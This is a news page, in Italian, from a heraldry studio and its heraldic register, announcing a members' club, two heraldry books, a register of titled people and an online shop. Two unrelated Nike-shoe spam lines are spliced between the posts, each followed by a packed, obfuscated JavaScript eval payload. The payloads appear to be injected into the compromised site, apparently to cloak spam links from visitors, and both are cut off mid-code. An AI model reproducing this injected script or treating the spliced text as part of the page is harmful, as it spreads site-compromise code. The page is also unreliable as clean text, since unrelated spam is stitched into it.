News
Jan 1

Nascita di Heritage club

 

Si comunica la nascita di un nuovo progetto a cura dello Studio Araldico Pasquini e collaterale al Registro Araldico Italiano: Heritage club.

Il progetto ha preso spunto dai siti delle case reali europee (in particolar modo di quella britannica) in cui si elencano i patrocini, le azioni di carità e le attività che svolgono ed ha molteplici scopi: oltre ad un database dei membri, delle directory e delle collezioni, si pubblicano anche contenuti speciali e di approfondimento.

 

In realtà non si tratta di un vero club, ma di una sorta di comunità di persone che oltre ad avere uno stemma , desiderano anche condividere i loro interessi, il loro retaggio, le onorificenze ricevute, le peculiarità, i patrocini che concedono, le opere di carità che fanno, i brand che rappresentano o di cui sono testimonial, le concessioni araldiche che rilasciano, le collezioni che posseggono e se sono disponibili all’acquisto o la permuta di libri o di altri oggetti da collezione.

 

Il database delle collezioni dei membri (e non) comprende archivi, armi, armature, oggetti vari, raccolte, pinacoteche, biblioteche, musei ed altri tipi di collezioni sempre relative al retaggio.

 

La directory di interessi correlati (antiquariato, monete, filatelia, faleristica, tabacchi, auto, etichetta, cerimonia, galateo, araldica, botanica, dimore, armi, tè e caffè, arredamento, sport,etc), offre ai visitatori del sito la possibilità di trovare facilmente riviste, esperti, aziende, siti ed altri contenuti correlati agli argomenti in oggetto e magari di confrontarsi fra di loro riguardo i comuni interessi.

 

L’inserimento della scheda membro costa 50 Euro una tantum e 25 Euro per ogni ulteriore aggiornamento.

 

L’inserimento della scheda directory costa 50 Euro una tantum (ad eccezione per i blog che è gratuito)

 

L’inserimento delle scheda collezione è gratuito.

 

Il sito del club si trova al seguente indirizzo:

 

https://heritageclub.it

Jan 1

Araldica del mare

 

 

E’ stato pubblicata l'opera dal titolo Araldica del mare, sempre edita da Borè e disponibile sulla piattaforma Youcanprint.


Con araldica del mare si intende l’araldica che in qualche modo contempla o celebra il mare e quindi sono presi in considerazione gli stemmi di localita’ marine di tutto il mondo, ma anche di associazioni, societa’, circoli, club, persone e figure letterarie o cinematografiche legate al mare. Particolare rilievo e’ stato dato alle citta’ che facevano parte della Lega Anseatica.

Sono censiti gli stemmi che hanno nel loro interno non solo il mare o l’oceano, ma anche imbarcazioni, ancore, conchiglie, ostriche, stelle marine, cavallucci marini, coralli, crostacei, i fari, i timoni, le vele, i remi, bussole, uncini, arpioni, tridenti, mostri marini, figure mitologiche, etc

Oltre agli stemmi ed emblemi con elementi marini di tutto il mondo, sono trattati anche argomenti affini come i tipi di imbarcazioni, le loro parti, gli usi che si possono fare con lo stemma, i nodi marinari, gli stemmi dei navigatori e scopritori, dei pirati ed alcune delle navi piu’ famose al mondo.

 

Pagina della pubblicazione

Jan 1

Uso degli emblemi araldici

 

E’ stato pubblicato il libro intitolato “Uso degli emblemi araldici“, guida ragionata all’uso degli stemmi e degli emblemi araldici in genere.


Anche se la repubblica non riconosce la nobiltà, l’araldica è tutelata come ogni altra forma di distinzione personale e familiare (De Cupis, “I diritti della personalità“, in Trattato di diritto civile e commerciale, diretto da Cicu e Messineo, Milano 1961, p. 169).
L’uso che si può fare dell’araldica è molteplice: una volta i nobili usavano gli stemmi sui loro scudi, sulle bandiere, sulle livree, nei sigilli e nella corrispondenza, oggi si può usare lo stemma all’incirca nello stesso modo, infatti oltre che nei modi già citati si può raffigurare lo stemma nei seguenti modi:
sugli inviti
su biglietti da visita, carte intestate, cartoline ed altro
su piatti e su posate
su anelli, gemelli, spille
su cravatte, ascot ed altri indumenti
su sigilli ed ex libris
su mobilia ed argenteria
come pitture murali ed incisioni (nella cappella di famiglia, all’esterno o all’interno di
case e dimore)
su bandiere, vessilli, gonfaloni, guidoni, stendardi, gagliardetti, pennoni, pinsel,
su account digitali (whatsapp, facebook, linkedin, etc).


La seguente guida censisce ben 120 tipi di usi ed ospita 171 foto.

 

Pagina della pubblicazione

Jan 1

Registro dei titolati italiani

E' online il sito dedicato ai titolati italiani.

 

Il nuovo registro contempla sia i titoli concessi da case regnanti, che quelli concessi da case pretendenti, quelli concessi da micronazioni, le onorificenze, i titoli manoriali, che i conferimenti privati.

 

A supporto del registro ci sono gli approfondimenti dedicati alla fons honorum, alla nobiltà generosa, agli ordini cavallereschi nobilitanti, ai conti palatini ed alle pubblicazioni accreditate per il riconoscimento dei titoli.

 

L'indirizzo del sito è registrotitolati.it/

 

Possono inserire l'emblema solo coloro che l'hanno già registrato sul RAI.

Running sports | Nike Dunk Low Coast UNCL - Grailifyeval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8
Jan 1

Apertura negozio online

 

Sul Contrado è stato aperto il negozio dello Studio Araldico Pasquini e del RAI.


Gli emblemi possono essere usati in vari modi e gli articoli in vendita sono a titolo dimostrativo; per chi è interessato è possibile avere un negozio proprio o una collezione.

 

Lo studio offre come servizio anche quello di realizzare una collezione delle singole casate.

 

L'indirizzo dello store è: https://www.contrado.it/stores/araldica-pasquini

Sports Shoes | Nike Release Dateseval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8
Italian English French German Japanese Portuguese Russian Spanish

Casate Italiane

Visitate il sito delle Casate Italiane

RAI Magazine

Il blog del RAI

Fidelity card

Sottoscrivete la fidelity card

Registrazioni

Compilate il modulo per registrare il vostro emblema

Guida araldica

La guida a tutti gli emblemi registrabili sul registro

Lo studio

Visitate il sito dello Studio Araldico Pasquini

Pubblicazione cartacea

Pubblicata la I Edizione cartacea del RAI